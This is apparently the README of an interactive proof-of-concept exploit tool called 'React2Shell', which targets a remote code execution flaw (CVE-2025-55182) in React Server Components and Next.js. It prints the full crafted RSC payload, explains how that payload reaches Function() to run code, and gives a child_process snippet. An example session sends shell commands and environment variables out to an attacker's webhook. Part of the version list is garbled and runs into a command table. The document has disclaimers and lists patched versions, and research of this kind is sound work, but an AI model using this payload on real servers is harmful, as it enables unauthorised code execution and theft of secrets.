## https://sploitus.com/exploit?id=8FEADF80-333D-57BE-A90A-869E659770A3
# React2Shell - CVE-2025-55182 Interactive PoC
Interactive shell for exploiting CVE-2025-55182, a Remote Code Execution vulnerability in React Server Components.
## Disclaimer
**This tool is provided for EDUCATIONAL and AUTHORIZED SECURITY TESTING purposes only.**
- Only use on systems you own or have explicit written permission to test
- Unauthorized access to computer systems is illegal
- The author is not responsible for any misuse of this tool
- This is a proof-of-concept for security research and awareness
## Vulnerability Overview
CVE-2025-55182 affects React Server Components (RSC) in:
- **Next.js** ` | Execute custom JavaScript |
| `!help` | Show help |
| `!exit` | Exit |
| `` | Execute shell command (e.g., `whoami`, `ls`, `cat /etc/passwd`) |
### Example Session
```
react2shell> !test
[+] Sent! Check webhook
react2shell> whoami
[+] Sent: whoami
react2shell> ls -la
[+] Sent: ls -la
react2shell> !env
[+] Sent! Check webhook for env vars
```
Results appear on your webhook, not in the terminal.
## Technical Details
### Payload Structure
```javascript
{
'0': '$1',
'1': {
'status': 'resolved_model',
'reason': 0,
'_response': '$4',
'value': '{"then":"$3:map","0":{"then":"$B3"},"length":1}',
'then': '$2:then'
},
'2': '$@3',
'3': [],
'4': {
'_prefix': '//',
'_formData': { 'get': '$3:constructor:constructor' },
'_chunks': '$2:_response:_chunks'
}
}
```
### Execution Flow
1. Payload is sent as multipart form data with `next-action` header
2. React Flight parser processes the chunks
3. `$@3` creates a Chunk reference
4. `$3:constructor:constructor` traverses to `Function`
5. `_prefix` content is passed to `Function()` and executed
### Notes for Next.js 15+
- Uses ESM modules, so `require()` is not available
- Use dynamic `import()` instead:
```javascript
import("child_process").then(cp => cp.execSync("whoami"))
```
## Patched Versions
Update to these versions to fix the vulnerability:
- Next.js >= 15.1.7
- Next.js >= 14.2.29
- Next.js >= 13.5.9
## References
- [React2Shell Official Site](https://react2shell.com)
- [Google Tsunami Scanner Plugin](https://github.com/google/tsunami-security-scanner-plugins)
## License
MIT License - For educational purposes only.
## Author
Security Research PoC - Use responsibly.